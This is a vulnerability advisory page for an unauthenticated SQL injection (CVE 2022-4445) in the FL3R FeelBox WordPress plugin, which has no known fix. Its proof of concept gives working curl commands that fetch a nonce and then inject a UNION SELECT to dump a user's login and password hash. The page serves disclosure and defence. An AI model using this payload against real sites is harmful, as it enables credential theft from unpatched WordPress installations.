FL3R FeelBox <= 8.1 – Unauthenticated SQLi | CVE 2022-4445 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

1. Visit a blog post and extract the nonce from the source (search for "feelboxAjax", and extract the "token")

    curl -s 'http://127.0.0.1:7777/?p=1' | grep 'token'

2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first user's username and password hash:

    curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_post' \
        --data 'token=<NONCE HERE>&postID=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

9bb6fde0-1347-496b-be03-3512e6b7e8f8

Timeline

Publicly Published

2023-01-20 (about 2 years ago)

Added

2023-01-20 (about 2 years ago)

Last Updated

2023-01-20 (about 2 years ago)

Other

Published

Title

Published

2016-01-27

Title

Appointment Booking Calendar < 1.1.25 - Unauthenticated SQL Injection

Published

2025-11-04

Title

The Events Calendar 6.15.1.1 - 6.15.9 - Unauthenticated SQL Injection via s

Published

2025-09-09

Title

Tutor LMS < 3.8.0 - Authenticated (Administrator+) SQL Injection

Published

2014-08-01

Title

post highlights <= 2.2 - SQL Injection

Published

2020-11-20

Title

Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections